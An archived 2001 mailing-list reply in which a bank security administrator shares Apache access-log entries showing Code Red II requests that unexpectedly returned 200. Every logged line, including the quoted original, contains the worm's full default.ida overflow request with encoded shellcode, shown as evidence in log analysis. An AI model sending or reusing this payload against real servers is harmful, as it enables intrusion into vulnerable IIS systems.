Re: [logs] 200 return code on Code Red II against Apache?

From: Dennis Jenkins (djenkinsat_private)
Date: Wed Sep 12 2001 - 13:57:53 PDT

Next message: Bonacum, Ernie: "[logs] Log parsing and ITO"

Previous message: Sweth Chandramouli: "[logs] 200 return code on Code Red II against Apache?"
In reply to: Sweth Chandramouli: "[logs] 200 return code on Code Red II against Apache?"
Next in thread: JW: "Re: [logs] 200 return code on Code Red II against Apache?"
Reply: JW: "Re: [logs] 200 return code on Code Red II against Apache?"
Reply: Papo Napolitano: "Re: [logs] 200 return code on Code Red II against Apache?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Yes, I have four of them (very odd...)

root@www:/var/log/apache# grep "default.ida" usb-access.log  | grep
"HTTP/1.0\" 200"
192.192.135.153 - - [05/Aug/2001:22:13:19 -0500] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
HTTP/1.0" 200 -
211.41.178.2 - - [20/Aug/2001:05:06:41 -0500] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
HTTP/1.0" 200 -
200.48.188.155 - - [22/Aug/2001:16:36:36 -0500] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
HTTP/1.0" 200 -
195.117.169.40 - - [04/Sep/2001:03:51:49 -0500] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
HTTP/1.0" 200 -
root@www:/var/log/apache#


Sweth Chandramouli wrote:
> 
>         This probably isn't appropriate for this list, or at
> least is more appropriate for other lists, but I'm tired (and about to
> go to sleep now that I've finally confirmed that none of my friends have
> been blown up or crushed by falling buildings) and figured the folks here
> might be likely to have seen this if anyone has.  So, has anyone seen an
> Apache server return a 200 rather than 404 (according to Apache's logs)
> in response to an attempted Code Red II exploit?  I've seen a single
> occurance of it to date, on a Solaris machine that quite regularly gets
> such attempts; all of the log entries for those other attempts (both
> before and since) had the proper 404 response code, but this particular
> one doesn't:
> 
> ct740592-a.westprt1.ky.home.com - - [11/Sep/2001:12:21:28 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 200 - "-" "-"
> 
>         .  I've only tracked down one other example of this
> mentioned on the web, at
> <http://www.geocrawler.com/lists/3/Debian-Linux/199/25/6335051/>; Ian,
> who reported that incident, never figured out what caused it, either.
> 
>         Could anyone who has seen this (or has a good idea of what
> it is) email me off-list?
> 
>         Thanks,
> 
>         Sweth.
> 
> --
> Sweth Chandramouli ; <svcat_private>
> President, Idiopathic Systems Consulting
> 
>   ------------------------------------------------------------------------
>    Part 1.2Type: application/pgp-signature

-- 
djenkinsat_private                           Universal Savings Bank.
Security Administrator, Unix Administrator, Alpha Geek

The three most dangerous things are a programmer with a soldering
iron, a manager who codes, and a user who gets ideas.

---------------------------------------------------------------------
To unsubscribe, e-mail: loganalysis-unsubscribeat_private
For additional commands, e-mail: loganalysis-helpat_private

Next message: Bonacum, Ernie: "[logs] Log parsing and ITO"
Previous message: Sweth Chandramouli: "[logs] 200 return code on Code Red II against Apache?"
In reply to: Sweth Chandramouli: "[logs] 200 return code on Code Red II against Apache?"
Next in thread: JW: "Re: [logs] 200 return code on Code Red II against Apache?"
Reply: JW: "Re: [logs] 200 return code on Code Red II against Apache?"
Reply: Papo Napolitano: "Re: [logs] 200 return code on Code Red II against Apache?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Sep 12 2001 - 14:01:33 PDT